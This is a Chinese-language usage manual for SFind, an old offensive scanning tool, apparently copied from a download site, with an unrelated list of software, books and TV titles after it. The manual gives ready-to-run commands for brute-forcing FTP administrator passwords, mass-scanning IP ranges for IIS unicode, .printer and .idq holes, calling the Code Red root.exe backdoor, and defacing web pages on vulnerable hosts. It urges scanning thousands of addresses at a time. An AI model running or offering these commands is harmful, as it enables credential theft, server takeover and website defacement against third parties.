FTP暴力破解测试方法:SFind -cracker FTP ftp服务器地址 用户名 smallletter
红色部分为用户填写,其余参数不变,参数smllletter是指探测密码类型,在此为小写字符~
使 用 说 明
SFind是一款命令方式的多线程扫描工具,最大的特点是它不包含任何附属文件,体积小、扫描速度快、携
带方便,扫描进度显示,仅仅只有一个EXE文件,在扫描完成后将结果保存到sfind.txt中。目前支持的功能
有(请大家支持本软件,一起找BUG,谢谢!):
端口扫描
CGI漏洞扫描
unicode漏洞扫描
.printer漏洞扫描
.idq漏洞扫描
FTP 匿名登陆扫描、通过FTP扫描administrator弱密码
codered 病毒主机扫描 新功能!!!
利用unicode漏洞直接修改主页、利用codered病毒修改主页 新功能!!!
下面看看详细说明和运行实例:
-p <端口开始端口 结束端口> 〈IP 地址开始地址 结束地址〉
端口扫描
:此方式可以扫描标准端口、自定义端口、可以对某一段地址内的指定端口扫描,如果不指定端口则扫描标准端口,目前的标准端口为10个,分别是:21、23、25、53、79、80、110、1143、3389、5631。
SFind -p 192.168.0.1
扫描192.168.0.1的标准端口
SFind -p 192.168.0.1 192.168.0.255
扫描192.168.0.1到192.168.0.255范围内所有主机的标准端口
SFind -p 1 200 192.168.0.1
扫描192.168.0.1主机1到200的端口此方式只能一次扫描一台主机
SFind -p 21 192.168.0.1
扫描192.168.0.1主机的21端口
SFind -p 21 192.168.0.1 192.168.0.255
扫描192.168.0.1到192.168.0.255中所有开放21端口的主机,可以利用此功能查找开放终端服务(端口3389)的主机,也可以利用此功能快速查找中木马冰河(端口7626)的主机
-cgi
cgi漏洞扫描:目前可以检测784个CGI漏洞,此方式只能扫描一台主机
SFind -cgi 192.168.0.1
扫描192.168.0.1的CGI漏洞
-uni <开始地址> <结束地址>
unicode漏洞扫描:如果不指定结束地址则只扫描一台主机,如果找到漏洞主机可以使用-um功能进行页面修改
SFind -uni 192.168.0.1 192.168.0.255
扫描192.168.0.1到192.168.0.255范围内所有unicode漏洞主机
-pri <开始地址> <结束地址>
.printer漏洞扫描:这是个远程溢出漏洞,具体就不介绍了,如果不指定结束地址则扫描一台主机
SFind -pri 192.168.0.1 192.168.0.255
扫描192.168.0.1 192.168.0.255范围内所有存在.printer漏洞的主机
-idq <开始地址> <结束地址>
.idq漏洞扫描:扫描.idq远程溢出漏洞,如果不指定结束地址则扫描一台主机
SFind -idq 192.168.0.1 192.168.0.255
扫描192.168.0.1到192.168.0.255范围内所有存在.idq漏洞的主机
-um <信息>
对存在unicode漏洞的主机和有codered病毒的主机进行页面修改,默认的WEB路径是c:\inetpub\wwwroot,使用此功能在对方机器的指定目录生成index.htm、index.asp、default.htm、default.asp四个文件,文件信息自己定义,大家可以在自己的机器上试试此功能
SFind -um 192.168.0.1 Hacker+by+Sunw
此命令将在192.168.0.1的c:\inetpub\wwwroot目录生成上叙四个文件,内容为:HackerbySunw
SFind -um 192.168.0.1 c:\inetpub\ts Hacker+by+Sunw
此命令在192.168.0.1的c:\inetpub\ts目录生成上叙四个文件,内容为:Hacker by Sunw
在使用此功能时必须要有权限对目录进行操作,如果在wwwroot目录不成功,可以换到inetpub\ts目录,这个目录可以写,信息内容不能超过50个字符,可以是英文也可以是中文(如果是中文则不能超过25个字),在写信息时空格字符用+号代替,中间不能有"<"、">"和"="符号。如果是上传到inetpub\ts目录,则可以通过在浏览器调用//xxx.xxx.xxx.xxx/ts/default.asp查看
-ftp <开始地址> <结束地址> [-admin]
FTP扫描:扫描允许匿名登陆的FTP服务器,如果加-admin参数则通过FTP服务器扫描administrator弱密码,如不指定结束地址则只扫描一台主机
SFind -ftp 192.168.0.1 192.168.0.255
此命令扫描192.168.0.1到192.168.0.255范围内所有允许匿名登陆的主机
SFind -ftp 192.168.0.1 192.168.0.255 -admin
此命令通过FTP服务器扫administrator弱密码,因为administrator在默认情况下是FTP服务的管理者,所以可以利用次特征扫描超级用户的口令。在绿盟xdowns56kModem上扫4000个ip地址绝不超过5分钟,所以利用此功能时请务必加大搜索力度,一次扫3000说什么也不过分
-codered <开始地址> <结束地址>
codered病毒主机扫描:扫描存在codered病毒的主机,此功能利用codered病毒会将cmd.exe复制到inetpub\ts目录下root.exe的特性进行测试,如果对方主机inetpub\ts目录存在root.exe则认为有codered病毒,可以直接通过浏览器调用root.exe,//地址/ts/root.exe?/c,具体的操作和unicode漏洞完全相同,如果要修改主页可以直接使用SFind的um功能!
SFind -codered 192.168.0.1 192.168.0.255
此命令扫描192.168.0.1 192.168.0.255范围内所有存在红色代码病毒的主机
本软件采用多线程扫描,如果网速过慢可能会拥挤导致无法正确扫描,可以按Ctrl+C中断扫描,在进行扫描时上次的扫描结果将被覆盖。
软件为免费软件可以任意复制,如果利用此软件做违法的事情,使用者自行承担责任。目前为测试版本,可能存在种种漏洞,如果您有发现或者有好的建议或意见请E-mailtoSunwMail@163.net也可以到我的主页 //sw_sun.myetang.com 留言给我,十分感谢您的测试!
- 橱柜装修管理系统
- KTV娱乐行业管理系统
- 混凝土制品厂员工考勤管理系统
- 保安队员信息管理系统——服务公司版
- 极强数据恢复软件
- 淘搜查询淘宝商品类目
- 执法记录仪视频恢复程序
- 富士相机高清视频恢复程序
- ERP系统
- 吊篮租赁管理系统
- EasyPDF阅读器(免费PDF转WORD)
- 采油厂档案管理系统
- 极速看图
- 万兴数据恢复专家
- 小区自动售水机水卡管理系统
- 签证办理信息管理系统
- 幂宝思维
- 创新行驶证驾驶证打印软件
- 数据模拟测试软件
- 数据模拟测试软件
- 廖彩杏用有声书轻松听出英语力一年52周电子多媒体有声绘本亲子软件
- 汽车座垫管理系统
- 万商堂淘宝优惠券助手
- 工程车辆成本核算管理系统
- 国风项目电子文档管理台账系统
- 便便游戏
- 聪明块
- 卡通人物测试
- 匈牙利纸牌
- 神秘图腾
- 明星足球
- 拯救福岛
- 孩子比赛游戏
- 賽馬大亨
- 气泡
- 看法
- 二拍/名家导读语文新课标必读丛书
- 西游记名(原著足本)/家导读语文新课标必读丛书
- 发电集控运维职业技能等级证书培训教材(初级1+X职业技能等级证书配套系列教材)
- 一本就够了幼儿全脑激化86招
- 长发姑娘(小学C级)/外教社牛津英语分级读物
- 西域南海史地考证译丛(精)/海上丝绸之路基本文献丛书
- 进出境动物检疫采样技术实务/国门生物安全系列丛书
- 药物分析技术(供药剂制药技术药品食品检验及相关专业使用第2版中等卫生职业教育规划教材)
- 儿科护理(供护理助产专业使用第3版十二五职业教育国家规划教材)
- 金婚·风雨情
- 四世同堂
- 男儿本色
- 千谎百计 第一季
- 鲜花朵朵
- 丐世英豪
- 人间正道是沧桑
- 良家妇女
- 女孩冲冲冲
- 都铎王朝 第三季